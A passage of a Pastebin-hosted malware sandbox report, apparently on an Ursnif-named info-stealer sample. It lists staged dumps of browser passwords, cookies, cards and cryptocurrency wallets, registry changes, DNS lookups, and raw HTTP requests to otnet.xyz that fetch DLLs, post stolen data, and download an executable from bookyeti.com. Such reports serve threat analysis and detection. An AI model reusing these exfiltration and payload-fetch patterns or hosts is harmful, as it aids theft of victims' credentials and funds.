  675. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  676.  
  677.  
  678. * Deleted Files:
  679. "C:\\ProgramData\\freebl3.dll",
  680. "C:\\ProgramData\\mozglue.dll",
  681. "C:\\ProgramData\\msvcp140.dll",
  682. "C:\\ProgramData\\nss3.dll",
  683. "C:\\ProgramData\\softokn3.dll",
  684. "C:\\ProgramData\\vcruntime140.dll",
  685. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  686. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill",
  687. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  688. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC",
  689. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  690. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  691. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  692. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies",
  693. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  694. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  695. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads",
  696. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  697. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files",
  698. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  699. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History",
  700. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  701. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  702. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  703. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  704. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy",
  705. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft",
  706. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin",
  707. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin",
  708. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin",
  709. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore",
  710. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin",
  711. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin",
  712. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash",
  713. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum",
  714. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC",
  715. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum",
  716. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus",
  717. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin",
  718. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko",
  719. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin",
  720. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD",
  721. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin",
  722. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin",
  723. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin",
  724. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX",
  725. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin",
  726. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin",
  727. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
  728. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
  729. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
  730. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
  731. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
  732. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
  733. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
  734. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
  735. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  737. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
  738. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  739. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
  740. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  741. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
  742. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  743. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
  744. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  745. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
  746.  
  747.  
  748. * Modified Registry Keys:
  749. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  750. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  751. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  752. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  753. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  754. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  755.  
  756.  
  757. * Deleted Registry Keys:
  758.  
  759. * DNS Communications:
  760.  
  761. "type": "A",
  762. "request": "otnet.xyz",
  763. "answers":
  764.  
  765. "data": "209.141.47.33",
  766. "type": "A"
  767.  
  768.  
  769.  
  770.  
  771. "type": "A",
  772. "request": "ip-api.com",
  773. "answers":
  774.  
  775. "data": "72.11.140.50",
  776. "type": "A"
  777.  
  778.  
  779. "data": "66.212.29.250",
  780. "type": "A"
  781.  
  782.  
  783.  
  784.  
  785. "type": "A",
  786. "request": "bookyeti.com",
  787. "answers":
  788.  
  789. "data": "199.204.213.10",
  790. "type": "A"
  791.  
  792.  
  793.  
  794.  
  795.  
  796. * Domains:
  797.  
  798. "ip": "209.141.47.33",
  799. "domain": "otnet.xyz"
  800.  
  801.  
  802. "ip": "72.11.140.50",
  803. "domain": "ip-api.com"
  804.  
  805.  
  806. "ip": "199.204.213.10",
  807. "domain": "bookyeti.com"
  808.  
  809.  
  810.  
  811. * Network Communication - ICMP:
  812.  
  813. * Network Communication - HTTP:
  814.  
  815. "count": 1,
  816. "body": "--1BEF0A57BE110FD467A--\r\n",
  817. "uri": "http://otnet.xyz/141",
  818. "user-agent": "",
  819. "method": "POST",
  820. "host": "otnet.xyz",
  821. "version": "1.1",
  822. "path": "/141",
  823. "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  824. "port": 80
  825.  
  826.  
  827. "count": 1,
  828. "body": "",
  829. "uri": "http://otnet.xyz/freebl3.dll",
  830. "user-agent": "",
  831. "method": "GET",
  832. "host": "otnet.xyz",
  833. "version": "1.1",
  834. "path": "/freebl3.dll",
  835. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  836. "port": 80
  837.  
  838.  
  839. "count": 1,
  840. "body": "",
  841. "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  842. "user-agent": "",
  843. "method": "GET",
  844. "host": "otnet.xyz",
  845. "version": "1.1",
  846. "path": "/freebl3.dll?ddosprotected=1",
  847. "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  848. "port": 80
  849.  
  850.  
  851. "count": 1,
  852. "body": "",
  853. "uri": "http://otnet.xyz/mozglue.dll",
  854. "user-agent": "",
  855. "method": "GET",
  856. "host": "otnet.xyz",
  857. "version": "1.1",
  858. "path": "/mozglue.dll",
  859. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  860. "port": 80
  861.  
  862.  
  863. "count": 1,
  864. "body": "",
  865. "uri": "http://otnet.xyz/msvcp140.dll",
  866. "user-agent": "",
  867. "method": "GET",
  868. "host": "otnet.xyz",
  869. "version": "1.1",
  870. "path": "/msvcp140.dll",
  871. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  872. "port": 80
  873.  
  874.  
  875. "count": 1,
  876. "body": "",
  877. "uri": "http://otnet.xyz/nss3.dll",
  878. "user-agent": "",
  879. "method": "GET",
  880. "host": "otnet.xyz",
  881. "version": "1.1",
  882. "path": "/nss3.dll",
  883. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  884. "port": 80
  885.  
  886.  
  887. "count": 1,
  888. "body": "",
  889. "uri": "http://otnet.xyz/softokn3.dll",
  890. "user-agent": "",
  891. "method": "GET",
  892. "host": "otnet.xyz",
  893. "version": "1.1",
  894. "path": "/softokn3.dll",
  895. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  896. "port": 80
  897.  
  898.  
  899. "count": 2,
  900. "body": "",
  901. "uri": "http://otnet.xyz/vcruntime140.dll",
  902. "user-agent": "",
  903. "method": "GET",
  904. "host": "otnet.xyz",
  905. "version": "1.1",
  906. "path": "/vcruntime140.dll",
  907. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  908. "port": 80
  909.  
  910.  
  911. "count": 1,
  912. "body": "--1BEF0A57BE110FD467A--\r\n",
  913. "uri": "http://ip-api.com/line/",
  914. "user-agent": "",
  915. "method": "POST",
  916. "host": "ip-api.com",
  917. "version": "1.1",
  918. "path": "/line/",
  919. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  920. "port": 80
  921.  
  922.  
  923. "count": 1,
  924. "body": "",
  925. "uri": "http://otnet.xyz/",
  926. "user-agent": "",
  927. "method": "POST",
  928. "host": "otnet.xyz",
  929. "version": "1.1",
  930. "path": "/",
  931. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  932. "port": 80
  933.  
  934.  
  935. "count": 1,
  936. "body": "",
  937. "uri": "http://bookyeti.com/img/3001.exe",
  938. "user-agent": "",
  939. "method": "GET",
  940. "host": "bookyeti.com",
  941. "version": "1.1",
  942. "path": "/img/3001.exe",
  943. "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
  944. "port": 80
  945.  
  946.  
  947.  
  948. * Network Communication - SMTP:
  949.  
  950. * Network Communication - Hosts:
  951.  
  952. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!